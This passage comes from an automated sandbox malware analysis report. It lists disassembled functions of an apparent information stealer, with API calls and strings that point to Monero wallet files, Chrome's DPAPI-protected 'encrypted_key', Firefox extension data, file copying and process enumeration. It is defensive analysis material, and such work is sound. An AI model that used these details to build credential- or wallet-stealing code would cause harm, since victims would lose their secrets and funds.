                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 8ef17bc17e15ab6adcc017614cd85ea06cfe3a851ff6e7a345e3a4d1d0c0cf2b
                        • Instruction ID: e0103afd06c0eba531af8699678243033941a2c2ef3cecdf100df70635c64f05
                        • Opcode Fuzzy Hash: 8ef17bc17e15ab6adcc017614cd85ea06cfe3a851ff6e7a345e3a4d1d0c0cf2b
                        • Instruction Fuzzy Hash: 60E122728101499ACB18FBA8DC9AEEF7738BF94300F50815BF51772191EF306A49DB66
                        Function 005CD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005D8B60: GetSystemTime.KERNEL32(005E0E1A,014AFBA0,005E05AE,?,?,005C13F9,?,0000001A,005E0E1A,00000000,?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005D8B86
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005CD481
                        • lstrlen.KERNEL32(00000000), ref: 005CD698
                        • lstrlen.KERNEL32(00000000), ref: 005CD6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 005CD72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 22971f7b7950f2d202f55995b2f70245c45804e142da7200e3e29610422d14fc
                        • Instruction ID: 6e06ea38c9242c5be64f65924fa99a5b12f97aa0aec289f78b3421ffb7118c0c
                        • Opcode Fuzzy Hash: 22971f7b7950f2d202f55995b2f70245c45804e142da7200e3e29610422d14fc
                        • Instruction Fuzzy Hash: FF9146728101459BCB18FBA8DC9AEEF7738BF94300F50412BF51762291EF346A49DB66
                        Function 005CD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005D8B60: GetSystemTime.KERNEL32(005E0E1A,014AFBA0,005E05AE,?,?,005C13F9,?,0000001A,005E0E1A,00000000,?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005D8B86
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005CD801
                        • lstrlen.KERNEL32(00000000), ref: 005CD99F
                        • lstrlen.KERNEL32(00000000), ref: 005CD9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 005CDA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: e14ead1eb7d8d05cf59b3a6daf69b74665efaf778e63b05525df37409e0094e3
                        • Instruction ID: 1a0541aadbceca470783b25ceebc46269355aa75f648706b4e9d4e68bcdb2a43
                        • Opcode Fuzzy Hash: e14ead1eb7d8d05cf59b3a6daf69b74665efaf778e63b05525df37409e0094e3
                        • Instruction Fuzzy Hash: 2F8115718101559BCB18FBA8DC59EEF7B38BF94300F40411BF407A6291EF346A49DB66
                        Function 005CF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 005DA7E6
                          • Part of subcall function 005C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C99EC
                          • Part of subcall function 005C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005C9A11
                          • Part of subcall function 005C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005C9A31
                          • Part of subcall function 005C99C0: ReadFile.KERNEL32(000000FF,?,00000000,005C148F,00000000), ref: 005C9A5A
                          • Part of subcall function 005C99C0: LocalFree.KERNEL32(005C148F), ref: 005C9A90
                          • Part of subcall function 005C99C0: CloseHandle.KERNEL32(000000FF), ref: 005C9A9A
                          • Part of subcall function 005D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005D8E52
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                          • Part of subcall function 005DA920: lstrcpy.KERNEL32(00000000,?), ref: 005DA972
                          • Part of subcall function 005DA920: lstrcat.KERNEL32(00000000), ref: 005DA982
                        • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,005E1580,005E0D92), ref: 005CF54C
                        • lstrlen.KERNEL32(00000000), ref: 005CF56B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                        • String ID: ^userContextId=4294967295$moz-extension+++
                        • API String ID: 998311485-3310892237
                        • Opcode ID: f18f4b4baec3cb5f6400a887311fc19cb6b20a68c04c79b3f1e8686b11cf8bc6
                        • Instruction ID: 89aac8bef1ae392d1daa0ef66a77b561c098669faac299be4d1212a80a10975f
                        • Opcode Fuzzy Hash: f18f4b4baec3cb5f6400a887311fc19cb6b20a68c04c79b3f1e8686b11cf8bc6
                        • Instruction Fuzzy Hash: 64513571D001499ADB14FBA8DC9ADEE7B38BF94300F40852BF81657291EE345A49CBA6
                        Function 005D70D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                        Download Yara Rule
                        Strings
                        • s], xrefs: 005D72AE, 005D7179, 005D717C
                        • s], xrefs: 005D7111
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 005D718C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: s]$s]$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 3722407311-79662556
                        • Opcode ID: acc53cb92fd8a896692dd6d8bc90fc0faabb944210d189112a9562636600f46b
                        • Instruction ID: 4c449c4a07050219db7593662a0280d460d8e904b715659e210ed965d42e847b
                        • Opcode Fuzzy Hash: acc53cb92fd8a896692dd6d8bc90fc0faabb944210d189112a9562636600f46b
                        • Instruction Fuzzy Hash: 9F517FB0D0421D9BDB24EB98DC89BEEBB74BF48304F1041ABE51576281EB746E88CF55
                        Function 005D3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: 524d5c52cd914f358281ab8bc7c27993b78d4cbac2839b43e8a9fa477b62af70
                        • Instruction ID: 7c1566e24363587143ae242cc2c0cf947069a3557b867cf1750b91e87e334c56
                        • Opcode Fuzzy Hash: 524d5c52cd914f358281ab8bc7c27993b78d4cbac2839b43e8a9fa477b62af70
                        • Instruction Fuzzy Hash: B4413F71D10209ABCB18EFE9D849AEEBB74FF54304F00841AE41676390EB759A45CFA2
                        Function 005C9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                          • Part of subcall function 005C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005C99EC
                          • Part of subcall function 005C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 005C9A11
                          • Part of subcall function 005C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 005C9A31
                          • Part of subcall function 005C99C0: ReadFile.KERNEL32(000000FF,?,00000000,005C148F,00000000), ref: 005C9A5A
                          • Part of subcall function 005C99C0: LocalFree.KERNEL32(005C148F), ref: 005C9A90
                          • Part of subcall function 005C99C0: CloseHandle.KERNEL32(000000FF), ref: 005C9A9A
                          • Part of subcall function 005D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 005D8E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 005C9D39
                          • Part of subcall function 005C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N\,00000000,00000000), ref: 005C9AEF
                          • Part of subcall function 005C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,005C4EEE,00000000,?), ref: 005C9B01
                          • Part of subcall function 005C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N\,00000000,00000000), ref: 005C9B2A
                          • Part of subcall function 005C9AC0: LocalFree.KERNEL32(?,?,?,?,005C4EEE,00000000,?), ref: 005C9B3F
                          • Part of subcall function 005C9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 005C9B84
                          • Part of subcall function 005C9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 005C9BA3
                          • Part of subcall function 005C9B60: LocalFree.KERNEL32(?), ref: 005C9BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: 2066a79e0ae30b5674a86425deeb101a789adf3cfe4c7dc12c4371a4c52d94ff
                        • Instruction ID: fa4972eb4ed493a4e00e8d9a737d5049feea936cef9ed31795e9a7df5a1fbd49
                        • Opcode Fuzzy Hash: 2066a79e0ae30b5674a86425deeb101a789adf3cfe4c7dc12c4371a4c52d94ff
                        • Instruction Fuzzy Hash: A9310DB5D10209AFCB14DBE4DC89FEE7BB8BB48304F54451DE906A7241E7349A04CBA5
                        Function 005D8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 005DA740: lstrcpy.KERNEL32(005E0E17,00000000), ref: 005DA788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,005E05B7), ref: 005D86CA
                        • Process32First.KERNEL32(?,00000128), ref: 005D86DE
                        • Process32Next.KERNEL32(?,00000128), ref: 005D86F3
                          • Part of subcall function 005DA9B0: lstrlen.KERNEL32(?,014A8918,?,\Monero\wallet.keys,005E0E17), ref: 005DA9C5
                          • Part of subcall function 005DA9B0: lstrcpy.KERNEL32(00000000), ref: 005DAA04
                          • Part of subcall function 005DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 005DAA12
                          • Part of subcall function 005DA8A0: lstrcpy.KERNEL32(?,005E0E17), ref: 005DA905
                        • CloseHandle.KERNEL32(?), ref: 005D8761
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 65d06e653cd2d9529b9e6dfc2bd28b2e69868d9dfe1badff66d9e9fa8965f11b
                        • Instruction ID: 9b6a3c3a55413d3da47e9e5e9f9cf832d2db3910170fa66968319208609fc313
                        • Opcode Fuzzy Hash: 65d06e653cd2d9529b9e6dfc2bd28b2e69868d9dfe1badff66d9e9fa8965f11b
                        • Instruction Fuzzy Hash: 51316F71901259ABCB64DF59CC45FEEBB78FB45700F10419BE509A22A0DB306E45CFA1
                        Function 005D7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,005E0E00,00000000,?), ref: 005D79B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 005D79B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,005E0E00,00000000,?), ref: 005D79C4
                        • wsprintfA.USER32 ref: 005D79F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000080A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.00000000009A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000A87000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AB3000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214482881.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214767681.0000000000AC2000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214881540.0000000000C60000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5c0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 14a525e46ae93178b3ed56cdf13eead703c0de841eb599065cacea5567a103ca
                        • Instruction ID: 9846730ab53ca3dcb0d72e7ab2286fe2885b323e405b2cfbc7846ae7c34fa8e5
                        • Opcode Fuzzy Hash: 14a525e46ae93178b3ed56cdf13eead703c0de841eb599065cacea5567a103ca
                        • Instruction Fuzzy Hash: 88112AB2904218ABCB54DFD9DD45BBEBBF8FB4CB11F10411AF605A2280E2395940CBB1
                        Function 005DC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 005DC74E
                          • Part of subcall function 005DBF9F: __amsg_exit.LIBCMT ref: 005DBFAF
                        • __getptd.LIBCMT ref: 005DC765
                        • __amsg_exit.LIBCMT ref: 005DC773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 005DC797
                        Memory Dump Source
                        • Source File: 00000000.00000002.2214308022.00000000005C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                        • Associated: 00000000.00000002.2214276260.00000000005C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.0000000000671000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.000000000067D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2214308022.00000000006A2000.00000040.00000001.01000000.00000003.sdmpDownload File
